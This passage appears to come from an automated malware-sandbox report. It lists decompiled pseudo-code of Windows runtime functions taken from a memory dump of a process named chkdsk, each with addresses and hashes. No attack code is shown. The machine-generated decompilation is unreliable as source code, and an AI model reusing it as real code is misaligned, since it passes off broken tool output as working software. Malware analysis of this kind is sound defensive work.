				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4e7d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04DA7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                      0x04e58ed6
                                                      0x04e58ee5
                                                      0x04e58eed
                                                      0x04e58ef0
                                                      0x04e58efa
                                                      0x04e58f03
                                                      0x04e58f0c
                                                      0x04e58f15
                                                      0x04e58f24
                                                      0x04e58f27
                                                      0x04e58f31
                                                      0x04e58f43
                                                      0x04e58f33
                                                      0x04e58f3c
                                                      0x04e58f3c
                                                      0x04e58f4e
                                                      0x04e58f4f
                                                      0x04e58f51
                                                      0x04e58f56
                                                      0x04e58f69

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fac5d2d2fe3a769f9a1fb14bb30b62ec8945d2c14d5a9cb7b31783b67c539d0
                                                      • Instruction ID: 41b206d3305fbf45346cf1556cbcf5655758a81310a1ef5b1d382b48727afaec
                                                      • Opcode Fuzzy Hash: 2fac5d2d2fe3a769f9a1fb14bb30b62ec8945d2c14d5a9cb7b31783b67c539d0
                                                      • Instruction Fuzzy Hash: 5511CC70A002599FDB04DFA9D541BAEB7F4FF08304F1442AAE919EB791E634A940CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E58A62 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E04E58A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4e7d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04DA7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                      0x04e58a62
                                                      0x04e58a71
                                                      0x04e58a79
                                                      0x04e58a82
                                                      0x04e58a85
                                                      0x04e58a89
                                                      0x04e58a8c
                                                      0x04e58a8f
                                                      0x04e58a92
                                                      0x04e58a95
                                                      0x04e58a9f
                                                      0x04e58ab1
                                                      0x04e58aa1
                                                      0x04e58aaa
                                                      0x04e58aaa
                                                      0x04e58abc
                                                      0x04e58abd
                                                      0x04e58abf
                                                      0x04e58ac4
                                                      0x04e58ada

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 73bf9626d5d22c9675c9eb8baf2184808ed0db87ac386b2e1db3a2db2eb94ab9
                                                      • Instruction ID: c82c6fbc75ef70fb91692048836df356eeace8bc3dfaa05a98faef7d83d13d03
                                                      • Opcode Fuzzy Hash: 73bf9626d5d22c9675c9eb8baf2184808ed0db87ac386b2e1db3a2db2eb94ab9
                                                      • Instruction Fuzzy Hash: 24012CB1A0021DAFDB00EFA9D9419EEB7B8FF48354F10405AF904FB351E634A910CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D8DB60 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04D8DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E04D8DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E04D8E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L04D8E8B0(__ecx, _t14, 0xfff);
							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                      0x04d8db64
                                                      0x04d8db66
                                                      0x04d8db6b
                                                      0x04d8dbaa
                                                      0x04d8db71
                                                      0x04d8db76
                                                      0x04d8db7a
                                                      0x04d8dba3
                                                      0x04d8db7c
                                                      0x04d8db87
                                                      0x04d8db8b
                                                      0x04de4fa1
                                                      0x04de4fb3
                                                      0x04de4fb8
                                                      0x04d8db91
                                                      0x04d8db96
                                                      0x04d8db98
                                                      0x04d8db98
                                                      0x04d8db8b
                                                      0x04d8db7a
                                                      0x04d8db9d
                                                      0x04d8dba2

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction ID: f8bf4ec4f2ea1561289446d12dba175897ad18b28192c6a9032ab015121f1195
                                                      • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction Fuzzy Hash: 81F068333415229BE7727A558880F7BB6B7DFC2A64F16003DB1059B2C4D970FC0296E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D8B1E1 Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04D8B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04DA7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04DA7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04E07016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                      0x04d8b1e8
                                                      0x04d8b1ea
                                                      0x04d8b1f3
                                                      0x04de4a17
                                                      0x04d8b1f9
                                                      0x04d8b1f9
                                                      0x04d8b1f9
                                                      0x04d8b201
                                                      0x04de4a21
                                                      0x04de4a2e
                                                      0x00000000
                                                      0x00000000
                                                      0x04de4a3b
                                                      0x04de4a4d
                                                      0x04de4a3d
                                                      0x04de4a46
                                                      0x04de4a46
                                                      0x04de4a55
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d8b20a
                                                      0x04d8b20a
                                                      0x04d8b20a
                                                      0x04d8b20a

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction ID: 519229dc87a810e11ba1e5572f9fffc988f7b015b03c970f9a20b99f2cef0d6b
                                                      • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction Fuzzy Hash: 0C01D132300680DBD722A75AC804F797B99FF51768F0940A6F9548B6B1E679F800D224
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E1FE87 Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E04E1FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4e7d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04DA7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                      0x04e1fe96
                                                      0x04e1fe9e
                                                      0x04e1fea1
                                                      0x04e1fead
                                                      0x04e1feb3
                                                      0x04e1feb9
                                                      0x04e1fec3
                                                      0x04e1fed5
                                                      0x04e1fec5
                                                      0x04e1fece
                                                      0x04e1fece
                                                      0x04e1fee0
                                                      0x04e1fee1
                                                      0x04e1fee3
                                                      0x04e1fee8
                                                      0x04e1fefb

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e7cd0efdb8210b6a06ccb854b4b08400251c72fd29094711d75b36d26b8f81e
                                                      • Instruction ID: 3c7a61a48d5e94dca7bc28bf2f4d2c793a8cc943fc69429bbe11f4494a70632f
                                                      • Opcode Fuzzy Hash: 7e7cd0efdb8210b6a06ccb854b4b08400251c72fd29094711d75b36d26b8f81e
                                                      • Instruction Fuzzy Hash: E8016270A00209EFCB14DFA8D542A6EB7F4EF04314F104199A504EB392D635E901CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E58F6A Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 48%
                                                      			E04E58F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4e7d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04DA7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                      0x04e58f6a
                                                      0x04e58f79
                                                      0x04e58f81
                                                      0x04e58f84
                                                      0x04e58f8b
                                                      0x04e58f91
                                                      0x04e58f94
                                                      0x04e58f9e
                                                      0x04e58fb0
                                                      0x04e58fa0
                                                      0x04e58fa9
                                                      0x04e58fa9
                                                      0x04e58fbb
                                                      0x04e58fbc
                                                      0x04e58fbe
                                                      0x04e58fc3
                                                      0x04e58fd6

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 001836efc3792ce8ca7ff5ce7f85df31eeab62fdf8bdec64e328a3505afbbbae
                                                      • Instruction ID: f427caf817d4605f62d18e523dd590fefd18bbd4ff4c388ee4b16b9fcb14cf9e
                                                      • Opcode Fuzzy Hash: 001836efc3792ce8ca7ff5ce7f85df31eeab62fdf8bdec64e328a3505afbbbae
                                                      • Instruction Fuzzy Hash: 3E013C74A0020DAFDB00EFA9D545AAEB7B4FF08304F10405AB905EB390EA74EA10CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E4131B Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 48%
                                                      			E04E4131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4e7d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04DA7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                      0x04e4131b
                                                      0x04e4132a
                                                      0x04e41330
                                                      0x04e41336
                                                      0x04e4133e
                                                      0x04e41341
                                                      0x04e41344
                                                      0x04e4134f
                                                      0x04e41361
                                                      0x04e41351
                                                      0x04e4135a
                                                      0x04e4135a
                                                      0x04e4136c
                                                      0x04e4136d
                                                      0x04e4136f
                                                      0x04e41374
                                                      0x04e41387

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81f22354f3175f993836d599aa1409fe544ac6775b6dc468afca8be1bec6df76
                                                      • Instruction ID: a3eb94e087dc8d3d195afa5425ee59084c0590770283b73d7ecbc4051e1e038f
                                                      • Opcode Fuzzy Hash: 81f22354f3175f993836d599aa1409fe544ac6775b6dc468afca8be1bec6df76
                                                      • Instruction Fuzzy Hash: 32013C71A01208AFDB04EFA9D545AAEB7F4FF48700F00405AF845EB381E674EA50CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E41608 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E04E41608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x4e7d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04DA7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                      0x04e41608
                                                      0x04e41617
                                                      0x04e4161d
                                                      0x04e41625
                                                      0x04e41628
                                                      0x04e4162b
                                                      0x04e41636
                                                      0x04e41648
                                                      0x04e41638
                                                      0x04e41641
                                                      0x04e41641
                                                      0x04e41653
                                                      0x04e41654
                                                      0x04e41656
                                                      0x04e4165b
                                                      0x04e4166e

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 628813941983a10d00f7e827d35c3131d1745c7539b45154495926903d83be3c
                                                      • Instruction ID: 67259cc52e64fe5325b6f936d4d9b4e6e817471ec9f1ed92f9854f34d3e103a4
                                                      • Opcode Fuzzy Hash: 628813941983a10d00f7e827d35c3131d1745c7539b45154495926903d83be3c
                                                      • Instruction Fuzzy Hash: D7F06271E00248EFDB04DFA9D405EAEB7F4EF44300F044099E905EB381E634E900CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DAC577 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DAC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04DAC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4d611cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04E588F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                      0x04dac577
                                                      0x04dac57d
                                                      0x04dac581
                                                      0x04dac5b5
                                                      0x04dac5b9
                                                      0x04dac5ce
                                                      0x04dac5ce
                                                      0x04dac5ca
                                                      0x00000000
                                                      0x04dac5ca
                                                      0x04dac5c4
                                                      0x04dac5c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04dac5ad
                                                      0x00000000
                                                      0x04dac5af

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 517aa6d5676633d8f625b9d4693b5775a0bc9d848255b8ce35539d703856220d
                                                      • Instruction ID: c1fe2e86b783ac90de2cbb189a5c70f7d23e7550445c21e741a6ce655c0b8e39
                                                      • Opcode Fuzzy Hash: 517aa6d5676633d8f625b9d4693b5775a0bc9d848255b8ce35539d703856220d
                                                      • Instruction Fuzzy Hash: F0F0B4B29356909FEB32DB14C04CB227BE4BB05F74F448467F45687211E7A4F8A0C651
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E58D34 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 43%
                                                      			E04E58D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4e7d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04DA7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                      0x04e58d34
                                                      0x04e58d43
                                                      0x04e58d4b
                                                      0x04e58d4e
                                                      0x04e58d52
                                                      0x04e58d5c
                                                      0x04e58d6e
                                                      0x04e58d5e
                                                      0x04e58d67
                                                      0x04e58d67
                                                      0x04e58d79
                                                      0x04e58d7a
                                                      0x04e58d7c
                                                      0x04e58d81
                                                      0x04e58d94

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86f561b54b309ae989fd4c754719bd46d6e7307b7ff081f844b9a8734d3c8446
                                                      • Instruction ID: 010e8db506f36f6af671517fc7eca63b11da7755fddd9848824868716c83b42d
                                                      • Opcode Fuzzy Hash: 86f561b54b309ae989fd4c754719bd46d6e7307b7ff081f844b9a8734d3c8446
                                                      • Instruction Fuzzy Hash: 5BF0B470F04608AFDB04EFB9D441B6E77B8FF04304F108099E905EB290EA34E910CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E42073 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E04E42073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E04E3FD22(__ecx);
				_t19 =  *0x4e7849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4e78748; // 0x0
					if(__eflags <= 0) {
						E04E41C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4e78724 & 0x00000004;
							if(( *0x4e78724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4e78724; // 0x0
					return E04E38DF1(__ebx, 0xc0000374, 0x4e75890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                      0x04e42076
                                                      0x04e42078
                                                      0x04e4207d
                                                      0x04e42083
                                                      0x04e420a4
                                                      0x04e420aa
                                                      0x04e420ac
                                                      0x04e420b7
                                                      0x04e420ba
                                                      0x04e420bc
                                                      0x04e420c9
                                                      0x04e420c9
                                                      0x04e420d0
                                                      0x04e420d2
                                                      0x00000000
                                                      0x04e420d2
                                                      0x04e420be
                                                      0x04e420c3
                                                      0x04e420c5
                                                      0x04e420c7
                                                      0x00000000
                                                      0x00000000
                                                      0x04e420c7
                                                      0x04e420bc
                                                      0x04e420d4
                                                      0x04e42085
                                                      0x04e42085
                                                      0x04e420a3
                                                      0x04e420a3

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 002d04f06f2eb6c77f256a8b1cc34ed552c6b1d7472e4f9727910e45d86c385b
                                                      • Instruction ID: 87612176d751ad9f12ee1a4e1b80b2ba394bf6ca4f1774062b845877a7cc2667
                                                      • Opcode Fuzzy Hash: 002d04f06f2eb6c77f256a8b1cc34ed552c6b1d7472e4f9727910e45d86c385b
                                                      • Instruction Fuzzy Hash: A1F027264211844BEF36BF2630093D16BD0EBD51ADF0934C5E55057204C57CBC83CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC927A Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E04DC927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E04DCFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E04DC92C6(_t11, _t14);
				}
				return _t11;
			}





                                                      0x04dc9295
                                                      0x04dc9299
                                                      0x04dc929f
                                                      0x04dc92aa
                                                      0x04dc92ad
                                                      0x04dc92ae
                                                      0x04dc92af
                                                      0x04dc92b0
                                                      0x04dc92b4
                                                      0x04dc92bb
                                                      0x04dc92bb
                                                      0x04dc92c5

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
